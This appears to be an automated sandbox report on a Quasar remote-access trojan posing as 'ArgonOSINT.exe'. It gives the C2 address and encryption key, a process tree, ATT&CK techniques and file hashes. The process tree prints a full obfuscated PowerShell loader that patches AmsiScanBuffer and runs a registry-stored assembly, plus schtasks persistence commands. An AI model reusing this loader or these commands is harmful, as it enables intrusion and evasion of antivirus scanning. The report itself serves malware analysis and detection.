Analysis

  • max time kernel
    12s
  • max time network
    17s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04-05-2024 15:55

General

  • Target

    ArgonOSINT.exe

  • Size

    409KB

  • MD5

    c4f70954d48c8653fde31fc63c619fc8

  • SHA1

    c2fe0bc4eab66f6cbf19ab3a80817eba8084982e

  • SHA256

    dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5

  • SHA512

    1a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc

  • SSDEEP

    12288:UpyJcC+x6AoV5l+6KprKF/UV6u4W0pDs:kwd+mDsV6u4g

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    BfQu2aop09VkjugTkmuc

  • install_name

    $sxr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $sxr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:576
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1004
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b4eb1993-0b01-467a-a9ce-1fec32688fe3}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3468
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:652
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:736
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:928
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:432
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                1⤵
                  PID:392
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:892
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1096
                      • c:\windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3084
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yIhBxOVWaPaP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gXFFKgMABqLmSh,[Parameter(Position=1)][Type]$wshtlkzLKc)$kgRVjzGtoaT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+'t'+''+'e'+'dD'+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+'ule',$False).DefineType('M'+'y'+'D'+'e'+'l'+[Char](101)+'gat'+[Char](101)+'T'+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$kgRVjzGtoaT.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'lN'+[Char](97)+''+'m'+'e'+[Char](44)+'Hid'+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$gXFFKgMABqLmSh).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'nag'+[Char](101)+''+[Char](100)+'');$kgRVjzGtoaT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+'i'+''+'d'+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+'o'+''+'t'+''+[Char](44)+'Vi'+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$wshtlkzLKc,$gXFFKgMABqLmSh).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $kgRVjzGtoaT.CreateType();}$BqRVtcrDsYjVC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+'.'+'d'+''+'l'+'l')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'in'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+'e'+[Char](77)+'e'+'t'+'h'+[Char](111)+''+'d'+'s');$LrmnudhkbWtJVp=$BqRVtcrDsYjVC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'roc'+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HrCzjRVOLHrIiaqSNGf=yIhBxOVWaPaP @([String])([IntPtr]);$RPiWTTDMJWmixFOhIbarIH=yIhBxOVWaPaP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UJmopAAFAmo=$BqRVtcrDsYjVC.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$gRNAsVwXkapNqV=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$UJmopAAFAmo,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+'b'+''+'r'+''+'a'+''+[Char](114)+'yA')));$RkyKQXcQErvRYAmWy=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$UJmopAAFAmo,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+'ct')));$TXlMYGa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gRNAsVwXkapNqV,$HrCzjRVOLHrIiaqSNGf).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+'l'+''+'l'+'');$BizlGAzxknMzNcWBX=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$TXlMYGa,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'uf'+[Char](102)+'e'+[Char](114)+'')));$zMqDdSYUbf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RkyKQXcQErvRYAmWy,$RPiWTTDMJWmixFOhIbarIH).Invoke($BizlGAzxknMzNcWBX,[uint32]8,4,[ref]$zMqDdSYUbf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BizlGAzxknMzNcWBX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RkyKQXcQErvRYAmWy,$RPiWTTDMJWmixFOhIbarIH).Invoke($BizlGAzxknMzNcWBX,[uint32]8,0x20,[ref]$zMqDdSYUbf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2524
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1152
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1176
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s EventSystem
                          1⤵
                            PID:1196
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                            1⤵
                              PID:1208
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s nsi
                              1⤵
                                PID:1364
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                1⤵
                                  PID:1404
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                  1⤵
                                    PID:1412
                                    • c:\windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:3044
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                      1⤵
                                        PID:1456
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                        1⤵
                                          PID:1480
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                          1⤵
                                            PID:1572
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                            1⤵
                                              PID:1604
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              1⤵
                                                PID:1620
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1744
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1752
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                    1⤵
                                                      PID:1764
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                      1⤵
                                                        PID:1808
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:1868
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1960
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                              PID:2032
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                              1⤵
                                                                PID:2224
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                1⤵
                                                                  PID:2232
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                  1⤵
                                                                    PID:2248
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                    1⤵
                                                                      PID:2348
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                      1⤵
                                                                        PID:2388
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2480
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                          1⤵
                                                                            PID:2500
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                            1⤵
                                                                              PID:2516
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                              1⤵
                                                                                PID:2532
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                1⤵
                                                                                  PID:2604
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3012
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                    1⤵
                                                                                      PID:3064
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                      1⤵
                                                                                        PID:3272
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        PID:3416
                                                                                        • C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe"
                                                                                          2⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4596
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe" /rl HIGHEST /f
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:3704
                                                                                          • C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2000
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                              4⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:3056
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3400
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77ArgonOSINT.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe'" /sc onlogon /rl HIGHEST
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4980
                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                          "C:\Windows\system32\taskmgr.exe" /7
                                                                                          2⤵
                                                                                            PID:4800
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3980
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:1584
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                            1⤵
                                                                                              PID:4812
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                              1⤵
                                                                                                PID:3876
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                  PID:4136
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                    PID:2028
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:4396
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:2212
                                                                                                      • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                        C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2196
                                                                                                        • C:\Windows\System32\InstallAgent.exe
                                                                                                          C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4456
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                            1⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4476
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            1⤵
                                                                                                              PID:1128
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                                PID:2868
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                1⤵
                                                                                                                  PID:940
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                  1⤵
                                                                                                                    PID:1824

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                  Execution

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Persistence

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Privilege Escalation

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Discovery

                                                                                                                  Query Registry

                                                                                                                  1
                                                                                                                  T1012

                                                                                                                  Peripheral Device Discovery

                                                                                                                  1
                                                                                                                  T1120

                                                                                                                  System Information Discovery

                                                                                                                  1
                                                                                                                  T1082

                                                                                                                  Command and Control

                                                                                                                  Web Service

                                                                                                                  1
                                                                                                                  T1102

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                    Filesize

                                                                                                                    162KB

                                                                                                                    MD5

                                                                                                                    152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                    SHA1

                                                                                                                    c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                    SHA256

                                                                                                                    a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                    SHA512

                                                                                                                    2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                  • C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe
                                                                                                                    Filesize

                                                                                                                    409KB

                                                                                                                    MD5

                                                                                                                    c4f70954d48c8653fde31fc63c619fc8

                                                                                                                    SHA1

                                                                                                                    c2fe0bc4eab66f6cbf19ab3a80817eba8084982e

                                                                                                                    SHA256

                                                                                                                    dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5

                                                                                                                    SHA512

                                                                                                                    1a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc

                                                                                                                  • C:\Windows\Temp\__PSScriptPolicyTest_mr2g4xi2.ryu.ps1
                                                                                                                    Filesize

                                                                                                                    1B

                                                                                                                    MD5

                                                                                                                    c4ca4238a0b923820dcc509a6f75849b

                                                                                                                    SHA1

                                                                                                                    356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                    SHA256

                                                                                                                    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                    SHA512

                                                                                                                    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                  • memory/576-64-0x000001AA0B130000-0x000001AA0B155000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    148KB

                                                                                                                  • memory/576-65-0x000001AA0B160000-0x000001AA0B18B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/576-73-0x00007FFA52ED0000-0x00007FFA52EE0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/576-72-0x000001AA0B160000-0x000001AA0B18B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/576-66-0x000001AA0B160000-0x000001AA0B18B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/652-83-0x000002076D0D0000-0x000002076D0FB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/652-77-0x000002076D0D0000-0x000002076D0FB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/652-84-0x00007FFA52ED0000-0x00007FFA52EE0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/736-94-0x00000211D9C30000-0x00000211D9C5B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/736-88-0x00000211D9C30000-0x00000211D9C5B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/736-95-0x00007FFA52ED0000-0x00007FFA52EE0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/928-105-0x000001E62A4A0000-0x000001E62A4CB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/928-106-0x00007FFA52ED0000-0x00007FFA52EE0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/928-99-0x000001E62A4A0000-0x000001E62A4CB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/1004-110-0x00000195A0790000-0x00000195A07BB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/2000-752-0x0000000073A10000-0x00000000740FE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/2000-14-0x0000000073A10000-0x00000000740FE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/2000-753-0x0000000006900000-0x000000000690A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                  • memory/2000-13-0x0000000073A10000-0x00000000740FE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/2524-28-0x0000021EEE4D0000-0x0000021EEE546000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    472KB

                                                                                                                  • memory/2524-49-0x00007FFA90490000-0x00007FFA9053E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/2524-48-0x00007FFA92E40000-0x00007FFA9301B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/2524-47-0x0000021EEE650000-0x0000021EEE67A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    168KB

                                                                                                                  • memory/2524-25-0x0000021EEE320000-0x0000021EEE342000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/3468-60-0x00007FFA90490000-0x00007FFA9053E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/3468-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3468-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3468-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3468-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3468-58-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3468-59-0x00007FFA92E40000-0x00007FFA9301B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/3468-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4596-1-0x0000000000A20000-0x0000000000A8C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    432KB

                                                                                                                  • memory/4596-0-0x0000000073A1E000-0x0000000073A1F000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4596-2-0x0000000005770000-0x0000000005C6E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.0MB

                                                                                                                  • memory/4596-19-0x0000000073A10000-0x00000000740FE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/4596-4-0x0000000073A10000-0x00000000740FE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

